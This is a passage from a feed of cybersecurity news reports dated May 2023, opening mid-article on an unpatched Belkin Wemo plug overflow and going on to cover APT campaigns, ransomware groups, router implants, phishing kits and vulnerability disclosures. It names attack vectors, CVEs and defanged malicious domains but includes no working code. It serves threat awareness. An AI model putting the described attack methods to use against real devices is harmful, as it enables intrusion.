The heart of the problem lies in a feature that makes it possible to rename the smart plug to a more "FriendlyName." The default name assigned is "Wemo mini 6E9."
Wemo Smart Plugs
"The name length is limited to 30 characters or less, but this rule is only enforced by the app itself," security researchers Amit Serper and Reuven Yakar said in a report shared with The Hacker News, adding the validation was not applied by the firmware code.
As a result, circumventing the character limit by using a Python module named pyWeMo can lead to a buffer overflow condition, which can then be reliably exploited to crash the device or, alternatively, trick the code into running malicious commands and take over control.
Belkin, in response to the findings, has said that it does not plan to address the flaw owing to the fact that the device is reaching end-of-life (EoL) and has been replaced by newer models.
Belkin Wemo Smart Plugs
"It appears that this vulnerability could be triggered via the Cloud interface (meaning, without a direct connection to the device)," the researchers cautioned.
In the absence of a fix, users of Wemo Mini Smart Plug V2 are recommended to avoid exposing them directly to the internet and ensure that appropriate segmentation measures are implemented if they have been deployed in sensitive networks.
"This is what happens when devices are shipped without any on-device protection. If you only rely on responsive security patching, as most device manufacturers do today, two things are certain: you will always be one step behind the attacker, and one day the patches will stop coming," said Igal Zeifman, vice president of marketing for Sternum.
State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered
17.5.23 BigBrothers The Hacker News
Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China.
This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News.
"The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said.
SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments.
The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore.
Earlier this February, Group-IB brought to light evidence that SideWinder may have targeted 61 government, military, law enforcement, and other organizations across Asia between June and November 2021.
More recently, the nation-state group was observed leveraging a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.
The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information.
Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload.
A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months.
Sidewinder Hacker
Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn[.]co).
Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov[.]org).
Further investigation into SideWinder's infrastructure has led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.
The rogue Android app passes off as a "Ludo Game" and prompts users to grant it access to contacts, location, phone logs, SMS messages, and calendar, effectively functioning as spyware capable of harvesting sensitive information.
Group-IB said the app also exhibits similarities with the fake Secure VPN app the company disclosed in June 2022 as being distributed to targets in Pakistan by means of a traffic direction system (TDS) called AntiBot.
In all, the domains point to SideWinder setting its sights on financial, government, and law enforcement organizations, as well as companies specializing in e-commerce and mass media in Pakistan and China.
"Like many other APT groups, SideWinder relies on targeted spear-phishing as the initial vector," the researchers said. "It is therefore important for organizations to deploy business email protection solutions that detonate malicious content."
U.S. Offers $10 Million Bounty for Capture of Notorious Russian Ransomware Operator
17.5.23 Crime The Hacker News
A Russian national has been charged and indicted by the U.S. Department of Justice (DoJ) for launching ransomware attacks against "thousands of victims" in the country and across the world.
Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar), the 30-year-old individual in question, is alleged to be a "central figure" in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020.
"These victims include law enforcement and other government agencies, hospitals, and schools," DoJ said. "Total ransom demands allegedly made by the members of these three global ransomware campaigns to their victims amount to as much as $400 million, while total victim ransom payments amount to as much as $200 million."
LockBit, Babuk, and Hive operate alike, leveraging unlawfully obtained access to exfiltrate valuable data and deploy ransomware on compromised networks. The threat actors also threaten to publicize the stolen information on a data leak site in an attempt to negotiate a ransom amount with victims.
Matveev has been charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, which is unlikely, he faces over 20 years in prison.
The U.S. State Department has also announced an award of up to $10 million for information that leads to the arrest and/or conviction of Matveev.
Separately, the Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions against the defendant, stating he claimed "his illicit activities will be tolerated by local authorities provided that he remains loyal to Russia."
According to cybersecurity journalist Brian Krebs, one of Matveev's alter egos included Orange, which the defendant used to establish the now-defunct Russian Anonymous Marketplace (aka RAMP) darknet forum.
Despite the flurry of law enforcement actions to crack down on the cybercrime ecosystem in recent years, the ransomware-as-a-service (RaaS) model continues to be a lucrative one, offering affiliates high-profit margins without having to develop and maintain the malware themselves.
The financial mechanics associated with RaaS has also lowered the barrier to entry for aspiring cybercriminals, who can avail the services offered by the ransomware developers to mount the attacks and pocket the lion's share of the ill-gotten proceeds.
Australian and U.S. authorities release BianLian ransomware alert#
The development comes as U.S. and Australian cybersecurity agencies released a joint advisory on BianLian ransomware, a double extortion group that has targeted several critical infrastructure, professional services, and property development sectors since June 2022.
"The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega," according to the advisory.
Czech cybersecurity firm Avast, earlier this year, published a free decryptor for BianLian ransomware to help victims of the malware recover locked files without having to pay the threat actors.
The security bulletin also arrives amid the emergence of a new ransomware strain dubbed LokiLocker that shares similarities with another locker called BlackBit and has been observed actively targeting entities in South Korea.
China's Mustang Panda Hackers Exploit TP-Link Routers for Persistent Attacks
16.5.23 Exploit The Hacker News
The Chinese nation-state actor known as Mustang Panda has been linked to a new set of sophisticated and targeted attacks aimed at European foreign affairs entities since January 2023.
An analysis of these intrusions, per Check Point researchers Itay Cohen and Radoslaw Madej, has revealed a custom firmware implant designed explicitly for TP-Link routers.
"The implant features several malicious components, including a custom backdoor named 'Horse Shell' that enables the attackers to maintain persistent access, build anonymous infrastructure, and enable lateral movement into compromised networks," the company said.
"Due to its firmware-agnostic design, the implant's components can be integrated into various firmware by different vendors."
The Israeli cybersecurity firm is tracking the threat group under the name Camaro Dragon, which is also known as BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich.
The exact method used to deploy the tampered firmware images on the infected routers is currently unknown, as is its usage and involvement in actual attacks. It's suspected that initial access may have been acquired by exploiting known security flaws or brute-forcing devices with default or easily guessable passwords.
What is known is that the C++-based Horse Shell implant provides attackers the ability to execute arbitrary shell commands, upload and download files to and from the router, and relay communication between two different clients.
But in an interesting twist, the router backdoor is believed to target arbitrary devices on residential and home networks, suggesting that the compromised routers are being co-opted into a mesh network with the goal of creating a "chain of nodes between main infections and real command-and-control."
In relaying communications between infected routers by using a SOCKS tunnel, the idea is to introduce an additional layer of anonymity and conceal the final server, as each node in the chain contains information only about the nodes preceding and succeeding it.
Put differently, the methods obscure the origin and destination of the traffic in a manner analogous to TOR, making it a lot more challenging to detect the scope of the attack and disrupt it.
"If one node in the chain is compromised or taken down, the attacker can still maintain communication with the C2 by routing traffic through a different node in the chain," the researchers explained.
That said, this is not the first time China-affiliated threat actors have relied on a network of compromised routers to meet their strategic objectives.
In 2021, the National Cybersecurity Agency of France (ANSSI) detailed an intrusion set orchestrated by APT31 (aka Judgement Panda or Violet Typhoon) that leveraged a piece of advanced malware known as Pakdoor (or SoWat) to allow the infected routers to communicate with each other.
"The discovery is yet another example of a long-standing trend of Chinese threat actors to exploit internet-facing network devices and modify their underlying software or firmware," the researchers said.
Inside Qilin Ransomware: Affiliates Take Home 85% of Ransom Payouts
16.5.23 Ransomware The Hacker News
Ransomware affiliates associated with the Qilin ransomware-as-a-service (RaaS) scheme earn anywhere between 80% to 85% of the ransom payments, according to new findings from Group-IB.
The cybersecurity firm said it was able to infiltrate the group in March 2023, uncovering details about the affiliates' payment structure and the inner workings of the RaaS program following a private conversation with a Qilin recruiter who goes by the online alias Haise.
"Many Qilin ransomware attacks are customized for each victim to maximize their impact," the Singapore-headquartered company said in a new report. "To do this, the threat actors can leverage such tactics as changing the filename extensions of encrypted files and terminating specific processes and services."
Qilin, also known as Agenda, was first documented by Trend Micro in August 2022, starting off a Go-based ransomware before switching to Rust in December 2022.
The adoption of Rust is also significant not only because of evasion detection capabilities, but also for the fact that it allows the threat actors to target Windows, Linux, and VMware ESXi servers.
Attacks mounted by the group make use of phishing emails containing malicious links as a means to obtain initial access and encrypt sensitive data, but not before exfiltrating it as part of a double extortion model.
Data from as many as 12 different companies have been posted on Qilin's data leak portal on the dark web between July 2022 and May 2023.
The victims, which mainly span critical infrastructure, education, and healthcare sectors, are located in Australia, Brazil, Canada, Colombia, France, Japan, Netherlands, Serbia, the U.K., and the U.S.
Group-IB said the Qilin actors also provide affiliates who are recruited to identify targets of interest and stage the attacks with an administrative panel to effectively oversee various parts of their operations.
"Qilin ransomware group has an affiliate panel divided into sections such as Targets, Blogs, Stuffers, News, Payments, and FAQs to manage and coordinate its network of affiliates," security researcher Nikolay Kichatov said.
Targets - A section to configure ransom notes, files, directories, and extensions to be skipped, extensions to be encrypted, processes to be terminated, and the mode of encryption, among others
Blogs - A section for affiliates to create blog posts with information about attacked companies that have not paid the ransom
Stuffers - A section for the threat actors to create accounts for other members of the team and manage their privileges
News - A section to post updates related to their ransomware partnerships (currently blank)
Payments - A section that contains transaction details, affiliate wallet balances, and options to withdraw illicit proceeds
FAQs - A section featuring support and documentation information that details the steps to use the ransomware
"Although Qilin ransomware gained notoriety for targeting critical sector companies, they are a threat to organizations across all verticals," Kichatov said.
"Moreover, the ransomware operator's affiliate program is not only adding new members to its network, but it is weaponizing them with upgraded tools, techniques, and even service delivery."
CopperStealer Malware Crew Resurfaces with New Rootkit and Phishing Kit Modules
16.5.23 Virus The Hacker News
The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish.
Trend Micro is tracking the financially motivated group under the name Water Orthrus. The adversary is also assessed to be behind another campaign known as Scranos, which was detailed by Bitdefender in 2019.
Active since at least 2021, Water Orthrus has a track record of leveraging pay-per-install (PPI) networks to redirect victims landing on cracked software download sites to drop an information stealer codenamed CopperStealer.
Another campaign spotted in August 2022 entailed the use of CopperStealer to distribute Chromium-based web browser extensions that are capable of performing unauthorized transactions and transferring cryptocurrency from victims' wallets to ones under attackers' control.
The latest attack sequences documented by Trend Micro don't mark much of a deviation, propagating CopperStealth by packaging it as installers for free tools on Chinese software-sharing websites.
"CopperStealth's infection chain involves dropping and loading a rootkit, which later injects its payload into explorer.exe and another system process," security researchers Jaromir Horejsi and Joseph C Chen said in a technical report.
"These payloads are responsible for downloading and running additional tasks. The rootkit also blocks access to blocklisted registry keys and prevents certain executables and drivers from running."
The driver denylist contains byte sequences pertaining to Chinese security software companies like Huorong, Kingsoft, and Qihoo 360.
CopperStealth also incorporates a task module that enables it to call out to a remote server and retrieve the command to be executed on the infected machine, equipping the malware to drop more payloads.
File Sharing Websites Act as Conduit for CopperPhish Phishing Kit#
The CopperPhish campaign, detected worldwide in April 2023, takes advantage of an analogous process to deploy the malware via PPI networks behind free anonymous file-sharing websites.
"Visitors will be redirected to a download page designed by the PPI network after clicking on its advertisements, which pretended to be a download link," the researchers said. "The downloaded file is PrivateLoader, which downloads and runs many different malware."
The downloader service, which is also offered on a PPI basis, is then used to retrieve and launch CopperPhish, a phishing kit that's responsible for harvesting credit card information.
It achieves this by "starting a rundll32 process and injecting a simple program with a browser window (written in Visual Basic) in it," which loads a phishing page urging victims to scan a QR code in order to verify their identity and enter a confirmation code to "restore your device's network."
"The window has no controls that can be used to minimize or close it," the researchers explained. "The victim could close the browser's process in Task Manager or Process Explorer, but they would also need to terminate the main payload process, otherwise the browser process will happen again due to the persistence thread."
Once the sensitive details are entered in the page, the CopperPhish malware displays the message "the identity verification has passed" alongside a confirmation code that the victim can enter on the aforementioned screen.
Providing the correct confirmation code also causes the malware to uninstall itself and delete all the dropped phishing files from the machine.
"The credential verification and confirmation code are two useful features that make this phishing kit more successful, as the victim cannot simply close the window or enter fake information just to get rid of the window," the researchers said.
The attribution to Water Orthrus is based on the fact that both CopperStealth and CopperPhish share similar source code characteristics as that of CopperStealer, raising the possibility that all three strains may have been developed by the same author.
The disparate objectives of the campaigns represent the evolution of the threat actor's tactics, indicating an attempt to add new capabilities to its arsenal and expand its financial horizons.
The findings come as malicious Google ads are being used to entice users into downloading fake installers for AI tools like Midjourney and OpenAI's ChatGPT that ultimately drop stealers such as Vidar and RedLine.
They also follow the discovery of a new traffic-monetizing service called TrafficStealer that leverages misconfigurations containers to redirect traffic to websites and generate fake ad clicks as part of an illicit money-making scheme.
Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems
16.5.23 Apple The Hacker News
A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems.
The findings come from SentinelOne, which observed an uptick in the number of Geacon payloads appearing on VirusTotal in recent months.
"While some of these are likely red-team operations, others bear the characteristics of genuine malicious attacks," security researchers Phil Stokes and Dinesh Devadoss said in a report.
Cobalt Strike is a well-known red teaming and adversary simulation tool developed by Fortra. Owing to its myriad post-exploitation capabilities, illegally cracked versions of the software have been abused by threat actors over the years.
While post-exploitation activity associated with Cobalt Strike has primarily singled out Windows, such attacks against macOS are something of a rarity.
In May 2022, software supply chain firm Sonatype disclosed details of a rogue Python package called "pymafka" that was designed to drop a Cobalt Strike Beacon onto compromised Windows, macOS, and Linux hosts.
That may, however, change with the emergence of Geacon artifacts in the wild. Geacon is a Go variant of Cobalt Strike that has been available on GitHub since February 2020.
Further analysis of two new VirusTotal samples that were uploaded in April 2023 has traced their origins to two Geacon variants (geacon_plus and geacon_pro) that were developed in late October by two anonymous Chinese developers z3ratu1 and H4de5.
The geacon_pro project is no longer accessible on GitHub, but an Internet Archive snapshot captured on March 6, 2023, reveals its ability to bypass antivirus engines such as Microsoft Defender, Kaspersky, and Qihoo 360 360 Core Crystal.
H4de5, the developer behind geacon_pro, claims the tool is mainly designed to support CobaltStrike versions 4.1 and later, while geacon_plus supports CobaltStrike version 4.0. The current version of the software is 4.8.
Xu Yiqing's Resume_20230320.app, one of the artifacts discovered by SentinelOne, employs a run-only AppleScript to reach out to a remote server and download a Geacon payload. It's compatible with both Apple silicon and Intel architectures.
"The unsigned Geacon payload is retrieved from an IP address in China," the researchers said. "Before it begins its beaconing activity, the user is presented with a two-page decoy document embedded in the Geacon binary. A PDF is opened displaying a resume for an individual named 'Xu Yiqing.'"
The Geacon binary, compiled from the geacon_plus source code, packs a multitude of functions that allows it to download next-stage payloads and exfiltrate data, and facilitate network communications.
The second sample, per the cybersecurity firm, is embedded within a trojanized app that masquerades as the SecureLink remote support app (SecureLink.app) and mainly targets Intel devices.
The barebones, unsigned application requests for users' permission to access contacts, photos, reminders, as well as the device's camera and microphone. Its main component is a Geacon payload built from the geacon_pro project that connects to a known command-and-control (C2) server in Japan.
The development comes as the macOS ecosystem is being targeted by a wide variety of threat actors, including state-sponsored groups, to deploy backdoors and information stealers.
"The uptick in Geacon samples over the last few months suggests that security teams should be paying attention to this tool and ensuring that they have protections in place," the researchers said.
CLR SqlShell Malware Targets MS SQL Servers for Crypto Mining and Ransomware
15.5.23 Virus The Hacker News
Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign that's designed to propagate a category of malware called CLR SqlShell that ultimately facilitates the deployment of cryptocurrency miners and ransomware.
"Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior," AhnLab Security Emergency response Center (ASEC) said in a report published last week.
A stored procedure is a subroutine that contains a set of Structured Query Language (SQL) statements for use across multiple programs in a relational database management system (RDBMS).
CLR (short for common language runtime) stored procedures available in SQL Server 2005 and later refer to stored procedures that are written in a .NET language such as C# or Visual Basic.
The attack method discovered by the South Korean cybersecurity firm entails the use of CLR stored procedure to install the malware in MS SQL servers using the xp_cmdshell command, which spawns a Windows command shell and passes an instruction as input for execution.
Some of the techniques employed by threat actors, including those associated with LemonDuck, MyKings (aka DarkCloud or Smominru), and Vollgar, concern the exploitation of internet-exposed MS SQL servers via brute-force and dictionary attacks to run xp_cmdshell commands and OLE stored procedures and execute malware.
The use of CLR stored procedures is the latest addition to this list, with attackers taking advantage of SqlShell routines to download next-stage payloads such as Metasploit and cryptocurrency miners like MrbMiner, MyKings, and LoveMiner.
What's more, SqlShells named SqlHelper, CLRSQL, and CLR_module have been used by different adversaries to escalate privileges on compromised servers and launch ransomware, proxyware, and incorporate capabilities to carry out reconnaissance efforts in targeted networks.
"SqlShell can install additional malware such as backdoors, coin miners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell," ASEC said.
Former Ubiquiti Employee Gets 6 Years in Jail for $2 Million Crypto Extortion Case
15.5.23 Crime The Hacker News
A former employee of Ubiquiti has been sentenced to six years in jail after he pleaded guilty to posing as an anonymous hacker and a whistleblower in an attempt to extort almost $2 million worth of cryptocurrency while working at the company.
Nickolas Sharp, 37, was arrested in December 2021 for using his insider access as a senior developer to steal confidential data and sending an anonymous email asking the network technology provider to pay 50 bitcoin (about $2 million at the time) in exchange for the siphoned information.
Ubiquiti, however, didn't yield to the ransom attempt and instead looped in law enforcement, which eventually identified Sharp as the hacker after tracing a VPN connection to a Surfshark account purchased with his PayPal account.
"Sharp repeatedly misused his administrative access to download gigabytes of confidential data from his employer," the U.S. Justice Department said, adding he "modified session file names to attempt to make it appear as if other coworkers were responsible for his malicious sessions."
The Oregon-based defendant, besides giving false statements denying any knowledge of the extortion scheme, tampered with log retention policies and other files in order to conceal his unauthorized activity on the company's network.
Sharp, who was employed at Ubiquiti from August 2018 through late March 2021, pleaded guilty earlier this February to falsely spreading the news that the company had been hacked by an unidentified perpetrator who had acquired administrator access to the firm's AWS accounts.
The fabricated security breach led to Ubiquiti's stock price sliding approximately 20% in March 2021, causing it to lose over $4 billion in market capitalization.
Ubiquiti formally disclosed the "incident" in January 2021, describing it as a case of "unauthorized access to certain of our information technology systems hosted by a third-party cloud provider." It further urged users to change their passwords and enable two-factor authentication.
In addition to the prison term, Sharp has been "sentenced to three years of supervised release and ordered to pay restitution of $1,590,487 and to forfeit personal property used or intended to be used in connection with these offenses."
Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks
15.5.23 IoT The Hacker News
Several security vulnerabilities have been disclosed in cloud management platforms associated with three industrial cellular router vendors that could expose operational technology (OT) networks to external attacks.
The findings were presented by Israeli industrial cybersecurity firm OTORIO at the Black Hat Asia 2023 conference last week.
The 11 vulnerabilities allow "remote code execution and full control over hundreds of thousands of devices and OT networks - in some cases, even those not actively configured to use the cloud."
Specifically, the shortcomings reside in the cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks to remotely manage and operate devices.
Successful exploitation of the vulnerabilities could pose severe risks to industrial environments, allowing adversaries to sidestep security layers as well as exfiltrate sensitive information and achieve code execution remotely on the internal networks.
Even worse, the issues could be weaponized to obtain unauthorized access to devices in the network and perform malicious operations such as shutdown with elevated permissions.
This, in turn, is made possible due to three different attack vectors that could be exploited to compromise and takeover cloud-managed IIoT devices through their cloud-based management platforms:
Weak asset registration mechanisms (Sierra Wireless): An attacker could scan for unregistered devices that are connected to the cloud, get their serial numbers by taking advantage of the AirVantage online Warranty Checker tool, register them to an account under their control, and execute arbitrary commands.
Flaws in security configurations (InHand Networks): An unauthorized user could leverage CVE-2023-22601, CVE-2023-22600, and CVE-2023-22598, a command injection flaw, to gain remote code execution with root privileges, issue reboot commands, and push firmware updates.
External API and interfaces (Teltonika Networks): A threat actor could abuse multiple issues identified in the remote management system (RMS) to "expose sensitive device information and device credentials, enable remote code execution, expose connected devices managed on the network, and allow impersonation of legitimate devices."
The six flaws impacting Teltonika Networks CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587, and CVE-2023-2588 were discovered following a "comprehensive research" carried out in collaboration with Claroty.
"An attacker successfully exploiting these industrial routers and IoT devices can cause a number of impacts on compromised devices and networks, including monitoring network traffic and stealing sensitive data, hijacking internet connections and accessing internal services," the companies said.
OTORIO said cloud-managed devices pose a "huge" supply-chain risk and that a single vendor compromise can act as a backdoor for accessing several OT networks in one sweep.
The development comes a little more than three months after the cybersecurity company disclosed 38 security flaws in the wireless industrial Internet of Things (IIoT) devices that could provide attackers a direct path to internal OT networks and put critical infrastructure at risk.
"As the deployment of IIoT devices becomes more popular, it's important to be aware that their cloud management platforms may be targeted by threat actors," security researcher Roni Gavrilov said. "A single IIoT vendor platform being exploited could act as a 'pivot point' for attackers, accessing thousands of environments at once."
New Ransomware Gang RA Group Hits U.S. and South Korean Organizations
15.5.23 Ransomware The Hacker News
A new ransomware group known as RA Group has become the latest threat actor to leverage the leaked Babuk ransomware source code to spawn its own locker variant.
The cybercriminal gang, which is said to have been operating since at least April 22, 2023, is rapidly expanding its operations, according to cybersecurity firm Cisco Talos.
"To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals," security researcher Chetan Raghuprasad said in a report shared with The Hacker News.
RA Group is no different from other ransomware gangs in that it launches double extortion attacks and runs a date leak site to apply additional pressure on victims into paying ransoms.
The Windows-based binary employs intermittent encryption to speed up the process and evade detection, not to mention delete volume shadow copies and contents of the machine's Recycle Bin.
"RA Group uses customized ransom notes, including the victim's name and a unique link to download the exfiltration proofs," Raghuprasad explained. "If the victim fails to contact the actors within three days, the group leaks the victim's files."
It also takes steps to avoid encrypting system files and folders by means of a hard-coded list so that it allows the victims to download the qTox chat application and reach out to the operators using the qTox ID provided on the ransom note.
What sets RA Group apart from other ransomware operations is that the threat actor has also been observed selling the victim's exfiltrated data on its leak portal by hosting the information on a secured TOR site.
The development comes less than a week after SentinelOne disclosed that threat actors of varying sophistication and expertise are increasingly adopting the Babuk ransomware code to develop a dozen variants that are capable of targeting Linux systems.
"There is a noticeable trend that actors increasingly use the Babuk builder to develop ESXi and Linux ransomware," the cybersecurity firm said. "This is particularly evident when used by actors with fewer resources, as these actors are less likely to significantly modify the Babuk source code."
Other ransomware actors that have adopted the Babuk source code over the past year include AstraLocker and Nokoyawa. Cheerscrypt, another ransomware strain based on Babuk, has been linked to a Chinese espionage actor called Emperor Dragonfly that's known for operating short-lived ransomware schemes such as Rook, Night Sky, and Pandora.
The findings also follow the discovery of two other new ransomware strains codenamed Rancoz and BlackSuit, the latter of which is designed to target both Windows and VMware ESXi servers.
"The constant evolution and release of new ransomware variants highlight the advanced skills and agility of [threat actors], indicating that they are responding to cybersecurity measures and checks being implemented and customizing their ransomware accordingly," Cyble said.
Researchers Uncover Powerful Backdoor and Custom Implant in Year-Long Cyber Campaign
15.5.23 Virus The Hacker News
Government, aviation, education, and telecom sectors located in South and Southeast Asia have come under the radar of a new hacking group as part of a highly-targeted campaign that commenced in mid-2022 and continued into the first quarter of 2023.
Symantec, by Broadcom Software, is tracking the activity under its insect-themed moniker Lancefly, with the attacks making use of a "powerful" backdoor called Merdoor.
Evidence gathered so far points to the custom implant being utilized as far back as 2018. The ultimate goal of the campaign, based on the tools and the victimology pattern, is assessed to be intelligence gathering.
"The backdoor is used very selectively, appearing on just a handful of networks and a small number of machines over the years, with its use appearing to be highly targeted," Symantec said in an analysis shared with The Hacker News.
"The attackers in this campaign also have access to an updated version of the ZXShell rootkit."
While the exact initial intrusion vector used is currently not clear, it's suspected to have involved the use of phishing lures, SSH brute-forcing, or the exploitation of internet-exposed servers.
The attack chains ultimately lead to the deployment of ZXShell and Merdoor, a fully-featured malware that can communicate with an actor-controlled server for further commands and log keystrokes.
ZXShell, first documented by Cisco in October 2014, is a rootkit that comes with various features to harvest sensitive data from infected hosts. The use of ZXShell has been linked to various Chinese actors like APT17 (Aurora Panda) and APT27 (aka Budworm or Emissary Panda) in the past.
"The source code of this rootkit is publicly available so it may be used by multiple different groups," Symantec said. "The new version of the rootkit used by Lancefly appears to be smaller in size, while it also has additional functions and targets additional antivirus software to disable."
Another Chinese link comes from the fact that the ZXShell rootkit is signed by the certificate "Wemade Entertainment Co. Ltd," which was previously reported by Mandiant in August 2019 to be associated with APT41 (aka Winnti).
Lancefly's intrusions have also been identified as employing PlugX and its successor ShadowPad, the latter of which is a modular malware platform privately shared among multiple Chinese state-sponsored actors since 2015.
That said, it's also known that certificate and tool sharing is prevalent among Chinese state-sponsored groups, making attribution to a specific known attack crew difficult.
"While the Merdoor backdoor appears to have been in existence for several years, it appears to only have been used in a small number of attacks in that time period," Symantec noted. "This prudent use of the tool may indicate a desire by Lancefly to keep its activity under the radar."
New 'MichaelKors' Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems
15.5.23 Ransomware The Hacker News
A new ransomware-as-service (RaaS) operation called MichaelKors has become the latest file-encrypting malware to target Linux and VMware ESXi systems as of April 2023.
The development points to cybercriminal actors increasingly setting their eyes on the ESXi, cybersecurity firm CrowdStrike said in a report shared with The Hacker News.
"This trend is especially noteworthy given the fact that ESXi, by design, does not support third-party agents or AV software," the company said.
"In fact, VMware goes as far as to claim it's not required. This, combined with the popularity of ESXi as a widespread and popular virtualization and management system, makes the hypervisor a highly attractive target for modern adversaries."
The targeting of VMware ESXi hypervisors with ransomware to scale such campaigns is a technique known as hypervisor jackpotting. Over the years, the approach has been adopted by several ransomware groups, including Royal.
What's more, an analysis from SentinelOne last week revealed that 10 different ransomware families, including Conti and REvil, have utilized leaked Babuk source code in September 2021 to develop lockers for VMware ESXi hypervisors.
Other notable e-crime outfits that have updated their arsenal to target ESXi consist of ALPHV (BlackCat), Black Basta, Defray, ESXiArgs, LockBit, Nevada, Play, Rook, and Rorschach.
Part of the reason why VMware ESXi hypervisors are becoming an attractive target is that the software runs directly on a physical server, granting a potential attacker the ability to run malicious ELF binaries and gain unfettered access over the machine's underlying resources.
Attackers looking to breach ESXi hypervisors can do so by using compromised credentials, followed by gaining elevated privileges and either laterally moving through the network or escaping the confines of the environment via known flaws to advance their motives.
VMware, in a knowledge base article last updated in September 2020, notes that "antivirus software is not required with the vSphere Hypervisor and the use of such software is not supported."
"More and more threat actors are recognizing that the lack of security tools, lack of adequate network segmentation of ESXi interfaces, and [in-the-wild] vulnerabilities for ESXi creates a target rich environment," CrowdStrike said.
Ransomware actors are from the only outfits to strike virtual infrastructure. In March 2023, Google-owned Mandiant attributed a Chinese nation-state group to the use of novel backdoors dubbed VIRTUALPITA and VIRTUALPIE in attacks aimed at VMware ESXi servers.
To mitigate the impact of hypervisor jackpotting, organizations are recommended to avoid direct access to ESXi hosts, enable two-factor authentication, take periodic backups of ESXi datastore volumes, apply security updates, and conduct security posture reviews.
"Adversaries will likely continue to target VMware-based virtualization infrastructure," CrowdStrike said. "This poses a major concern as more organizations continue transferring workloads and infrastructure into cloud environments all through VMWare Hypervisor environments."
New Phishing-as-a-Service Platform Lets Cybercriminals Generate Convincing Phishing Pages
13.5.23 Phishing The Hacker News
A new phishing-as-a-service (PhaaS or PaaS) platform named Greatness has been leveraged by cybercriminals to target business users of the Microsoft 365 cloud service since at least mid-2022, effectively lowering the bar to entry for phishing attacks.
"Greatness, for now, is only focused on Microsoft 365 phishing pages, providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages," Cisco Talos researcher Tiago Pereira said.
"It contains features such as having the victim's email address pre-filled and displaying their appropriate company logo and background image, extracted from the target organization's real Microsoft 365 login page."
Campaigns involving Greatness have mainly manufacturing, health care, and technology entities located in the U.S., the U.K., Australia, South Africa, and Canada, with a spike in activity detected in December 2022 and March 2023.
Phishing kits like Greatness offer threat actors, rookies or otherwise, a cost-effective and scalable one-stop shop, making it possible to design convincing login pages associated with various online services and bypass two-factor authentication (2FA) protections.
Specifically, the authentic-looking decoy pages function as a reverse proxy to harvest credentials and time-based one-time passwords (TOTPs) entered by the victims.
Attack chains begin with malicious emails containing an HTML attachment, which, upon opening, executes obfuscated JavaScript code that redirects the user to a landing page with the recipient's email address already pre-filled and prompts for their password and MFA code.
The entered credentials and tokens are subsequently forwarded to the affiliate's Telegram channel for obtaining unauthorized access to the accounts in question.
The AiTM phishing kit also comes with an administration panel that enables the affiliate to configure the Telegram bot, keep track of stolen information, and even build booby-trapped attachments or links.
What's more, each affiliate is expected to have a valid API key in order to be able to load the phishing page. The API key also prevents unwanted IP addresses from viewing the phishing page and facilitates behind-the-scenes communication with the actual Microsoft 365 login page by posing as the victim.
"Working together, the phishing kit and the API perform a 'man-in-the-middle' attack, requesting information from the victim that the API will then submit to the legitimate login page in real time," Pereira said.
"This allows the PaaS affiliate to steal usernames and passwords, along with the authenticated session cookies if the victim uses MFA."
The findings come as Microsoft has begun enforcing number matching in Microsoft Authenticator push notifications as of May 8, 2023, to improve 2FA protections and fend off prompt bombing attacks.
XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks
13.5.23 Virus The Hacker News
Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems.
Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany.
